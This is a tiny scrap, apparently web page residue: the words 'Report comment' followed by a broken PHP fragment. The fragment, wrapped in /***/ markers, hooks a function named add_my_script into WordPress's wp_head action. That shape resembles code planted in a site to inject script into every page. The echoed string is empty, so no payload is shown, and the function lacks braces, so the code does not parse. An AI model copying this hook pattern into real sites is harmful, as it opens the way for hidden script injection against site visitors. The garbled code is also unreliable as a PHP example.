Report comment

/***/function add_my_script() echo '';
add_action('wp_head', 'add_my_script');/***/